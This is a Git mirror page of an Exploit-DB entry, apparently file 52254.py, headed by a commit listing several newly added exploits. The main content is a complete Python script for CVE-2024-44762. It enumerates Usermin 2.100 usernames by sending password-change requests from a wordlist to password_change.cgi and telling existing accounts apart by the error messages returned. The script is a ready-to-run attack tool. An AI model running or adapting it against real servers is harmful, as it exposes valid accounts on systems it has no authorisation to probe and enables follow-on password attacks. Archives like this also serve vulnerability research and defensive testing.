bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52254.py
Exploit-DB 9ddf81331a DB: 2025-04-18 
10 changes to exploits/shellcodes/ghdb

TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption
TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)

Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)

Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation

compop.ca 3.5.3 - Arbitrary code Execution

Usermin 2.100 - Username Enumeration

ABB Cylon Aspect 3.08.02 (deployStart.php) - Unauthenticated Command Execution

ABB Cylon Aspect 3.08.02 (ethernetUpdate.php)  - Authenticated Path Traversal

AnyDesk 9.0.1 - Unquoted Service Path
2025-04-18 00:16:31 +00:00

54 lines
No EOL
2.3 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Usermin 2.100 - Username Enumeration
# Date: 10.02.2024
# Exploit Author: Kjesper
# Vendor Homepage: https://www.webmin.com/usermin.html
# Software Link: https://github.com/webmin/usermin
# Version: <= 2.100
# Tested on: Kali Linux
# CVE: CVE-2024-44762
# https://senscybersecurity.nl/cve-2024-44762-explained/
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Username Enumeration (Version 2.100)
# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt
import requests
import json
import requests
import argparse
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")
args = parser.parse_args()
if len(sys.argv) != 5:
print("Please provide the -u for URL and -w for the wordlist containing the usernames")
print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt")
exit()
usernameFile = open(args.wordlist_users, 'r')
dataUsername = usernameFile.read()
usernameFileIntoList = dataUsername.split("\n")
usernameFile.close()
for i in usernameFileIntoList:
newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
if "Failed to change password: The current password is incorrect." in response.text:
print("Possible user found with username: " + i)
if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
print("Application is most likely not vulnerable and are therefore quitting.")
exit() # comment out line 33-35 if you would still like to try username enumeration.
Reference in a new issue View git blame Copy permalink